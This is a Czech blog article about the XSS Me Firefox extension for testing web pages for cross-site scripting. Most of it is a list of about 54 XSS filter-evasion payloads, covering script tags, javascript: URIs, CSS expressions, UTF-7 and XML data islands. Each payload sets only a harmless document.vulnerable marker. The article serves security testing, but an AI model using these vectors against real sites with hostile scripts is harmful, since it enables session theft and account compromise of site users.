XSS Cross-Site Scripting XSS Me plugin Firefox

XSS exploit Web hacking a Cross-Site Scripting je obsáhle téma o kterém píše kvantum lidí řadu let. Ale. Otevřu stránku, čtu (na první pohled) cool text, 10 příkladu, všude kolem hezké barvy. Po hodině čtení jste tam kde na začátku. Proč po přečtení AirDump tutoriálu zvládnete XSS během chvilky? Na to vám odpoví článek Hackujeme webove aplikace – XSS. V první řadě, většina tutoriálu na webu je „technicko-teoretického“ charakterua čtení nebo překlad anglické nápovědy nevydá na víc. Praktická rovina neexistuje, pokud ano tak v nereálnich příkladech. Příčina je jednoduchá.

diskuze sql injekce a nástroje

Když se někdo naučí kódit je nově získanou schopností zjevně unešen. Pak startuje chrlení „odborných“ textů, plných code a quote – To je pro security lamu jakýsi druh masturbace. Demonstrace vlastního hacku, hlubší praktickou znalost TOR) a jeden plug-in. Tímto zároveň vyslovuju naději, že téma XSS je pro toto století uzavřeno. Pokud narazíte na nějakého spisovatele odkažte ho na tento článek :) Firefox pluginu o kterém je řeč nazval jeho vývojář (Security Compass) jménem XSSme. Instalace pluginu (rozšíření) je nachlup stejná jako u ostatních extension (Ad-Block,No Script.. atd.)

xss me plug-in firefox

Nabídka XSSme sidebaru je v menu Nástroje nebo klikacím menu myší. Ovládací panel se otevře na levé straně. Konfigurace není potřeba. Záleži pouze natom co přesně se chystáte na webové stránce testovat. Test všech stringu obsažených v databáze může trvat déle.

xss me výstup

Výsledek testováni. Na XSS zranitelnost bylo otestováno 54 stringů. Výstup testu je přehledný a zobrazí se v novém okně. Test webové stránky AirDump.Net ukázal, že stránka není testovací sekvenci XSS zranitelná.

<SCRIPT>document.vulnerable=true;</SCRIPT>
<IMG SRC=“jav ascript:document.vulnerable=true;“>
<IMG SRC=“javascript:document.vulnerable=true;“>
<IMG SRC=“ &#14; javascript:document.vulnerable=true;“>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
<SCRIPT <B>document.vulnerable=true;</SCRIPT>
<IMG SRC=“javascript:document.vulnerable=true;“
<iframe src=“javascript:document.vulnerable=true;
<SCRIPT>a=/XSS/\ndocument.vulnerable=true;</SCRIPT>
\“;document.vulnerable=true;;//
</TITLE><SCRIPT>document.vulnerable=true;</SCRIPT>
<INPUT TYPE=“IMAGE“ SRC=“javascript:document.vulnerable=true;“>
<BODY BACKGROUND=“javascript:document.vulnerable=true;“>
<BODY ONLOAD=document.vulnerable=true;>
<IMG DYNSRC=“javascript:document.vulnerable=true;“>
<IMG LOWSRC=“javascript:document.vulnerable=true;“>
<BGSOUND SRC=“javascript:document.vulnerable=true;“>
<BR SIZE=“&{document.vulnerable=true}“>
<LAYER SRC=“javascript:document.vulnerable=true;“></LAYER>
<LINK REL=“stylesheet“ HREF=“javascript:document.vulnerable=true;“>
<STYLE>li {list-style-image: url(„javascript:document.vulnerable=true;“);</STYLE><UL><LI>XSS
<IMG SRC=’vbscript:document.vulnerable=true;‘>
1/4script3/4document.vulnerable=true;1/4/script3/4
<META HTTP-EQUIV=“refresh“ CONTENT=“0;url=javascript:document.vulnerable=true;“>
<META HTTP-EQUIV=“refresh“ CONTENT=“0; URL=http://;URL=javascript:document.vulnerable=true;“>
<IFRAME SRC=“javascript:document.vulnerable=true;“></IFRAME>
<FRAMESET><FRAME SRC=“javascript:document.vulnerable=true;“></FRAMESET>
<TABLE BACKGROUND=“javascript:document.vulnerable=true;“>
<TABLE><TD BACKGROUND=“javascript:document.vulnerable=true;“>
<DIV STYLE=“background-image: url(javascript:document.vulnerable=true;)“>
<DIV STYLE=“background-image: url(&#1;javascript:document.vulnerable=true;)“>
<DIV STYLE=“width: expression(document.vulnerable=true);“><STYLE>@im\port’\ja\vasc\ript:document
.vulnerable=true‘;</STYLE>
<IMG STYLE=“xss:expr/*XSS*/ession(document.vulnerable=true)“>
<XSS STYLE=“xss:expression(document.vulnerable=true)“>
exp/*<A STYLE=’no\xss:noxss(„*//*“);xss:ex/*XSS*//*/*/pression(document.vulnerable=true)‘>
<STYLE TYPE=“text/javascript“>document.vulnerable=true;</STYLE>
<STYLE>.XSS{background-image:url(„javascript:document.vulnerable=true“);}</STYLE><A CLASS=XSS></A>
<STYLE type=“text/css“>BODY{background:url(„javascript:document.vulnerable=true“)}</STYLE>
<!–[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]–>
<BASE HREF=“javascript:document.vulnerable=true;//“>
<? echo(‚<SCR)‘;echo(‚IPT>document.vulnerable=true</SCRIPT>‘); ?>
<a href=“javascript#document.vulnerable=true;“>
<div onmouseover=“document.vulnerable=true;“>
<img src=“javascript:document.vulnerable=true;“>
<img dynsrc=“javascript:document.vulnerable=true;“>
<input type=“image“ dynsrc=“javascript:document.vulnerable=true;“>
<bgsound src=“javascript:document.vulnerable=true;“>
&<script>document.vulnerable=true;</script>
&{document.vulnerable=true;};
<img src=&{document.vulnerable=true;};>
<link rel=“stylesheet“ href=“javascript:document.vulnerable=true;“>
<iframe src=“vbscript:document.vulnerable=true;“>
<img src=“mocha:document.vulnerable=true;“>
<img src=“livescript:document.vulnerable=true;“>
<a href=“about:<script>document.vulnerable=true;</script>“>
<meta http-equiv=“refresh“ content=“0;url=javascript:document.vulnerable=true;“>
<body onload=“document.vulnerable=true;“>
<div style=“background-image: url(javascript:document.vulnerable=true;);“>
<div style=“behaviour: url([link to code]);“>
<div style=“binding: url([link to code]);“>
<div style=“width: expression(document.vulnerable=true;);“>
<style type=“text/javascript“>document.vulnerable=true;</style>
<object classid=“clsid:…“ codebase=“javascript:document.vulnerable=true;“>
<style><!–</style><script>document.vulnerable=true;//–></script>
<<script>document.vulnerable=true;</script>
<![CDATA[<!–]]<script>document.vulnerable=true;//–></script>
<!– — –><script>document.vulnerable=true;</script><!– — –>
<img src=“blah“onmouseover=“document.vulnerable=true;“>
<img src=“blah>“ onmouseover=“document.vulnerable=true;“>
<xml src=“javascript:document.vulnerable=true;“>
<xml id=“X“><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
<div datafld=“b“ dataformatas=“html“ datasrc=“#X“></div>
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>

<META HTTP-EQUIV=“Set-Cookie“ Content=“USERID=<SCRIPT>document.vulnerable=true</SCRIPT>“>
<HEAD><META HTTP-EQUIV=“CONTENT-TYPE“ CONTENT=“text/html; charset=UTF-7″> </HEAD>+ADw-SCRIPT+AD4
-document.vulnerable=true;+ADw-/SCRIPT+AD4-

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document
.vulnerable=true></OBJECT>

<XML ID=I><X><C><![CDATA[<IMG SRC=“javas]]<![CDATA[cript:document.vulnerable=true;“>]]</C><X></xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID=“xss“><I><B><IMG SRC=“javas<!—->cript:document.vulnerable=true“></B></I><XML><SPAN DATASRC=
„#xss“DATAFLD=“B“ DATAFORMATAS=“HTML“></SPAN>

<HTML><BODY><?xml:namespace prefix=“t“ ns=“urn:schemas-microsoft-com:time“><?import namespace=“t“
implementation=“#default#time2″> <t:set attributeName=
„innerHTML“ to=“XSS<SCRIPT DEFER>document.vulnerable=true </SCRIPT>“></BODY></HTML>

Další stringy lze do seznamu pohodlně doplňovat. Ručně nebo pomocí XML importu v menu rozhraní. Rozšíření si můžete stáhnou na subdoméně download ve složce XSS-Me. Definice XSS ve WiKi.

Kam dál?